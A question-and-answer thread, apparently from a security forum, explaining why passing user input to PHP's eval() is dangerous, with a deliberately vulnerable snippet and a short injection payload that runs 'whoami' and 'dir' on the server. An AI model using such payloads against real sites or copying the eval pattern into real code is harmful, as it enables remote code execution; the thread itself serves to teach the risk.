# How eval() in php can be dangerous in web application's security?

Tags: php

I want to know that **How eval function can be dangerous for any web application's Security?**

Below is the code I use to understand when any user input passes to the eval function, then **How an attacker can exploit it?**

```
<?php

$x = @$_GET['arg'];

eval("\$y = \"$x\";");
echo $x;

?>
```

Comment: it's more-or-less the same as allowing .php file uploads from any user.

Answer (score 6, accepted):

Ok, first imagine that I send this request:

```
script.php?arg=foo
```

Your eval then looks like this:

```
$y = "foo";
```

But if I send this:

```
script.php?arg=";%20echo%20exec('whoami');%20//
```

This turns your code into this:

```
$y = ""; echo exec('whoami'); //";
```

Which executes the "whoami" command on the server and prints the result. The `//` comments out the end part of your original code so it gets ignored and my code runs successfully.

This is an incredibly trivial remote code execution bug to exploit.

Comment: Wow, I just try this after your payload `"; echo system('dir'); //` And I said "fuck really". Now I got how it can be dangerous. Thanks @Polynomial

Comment: Yup. You can just run any arbitrary PHP, and thus any arbitrary system commands, via this.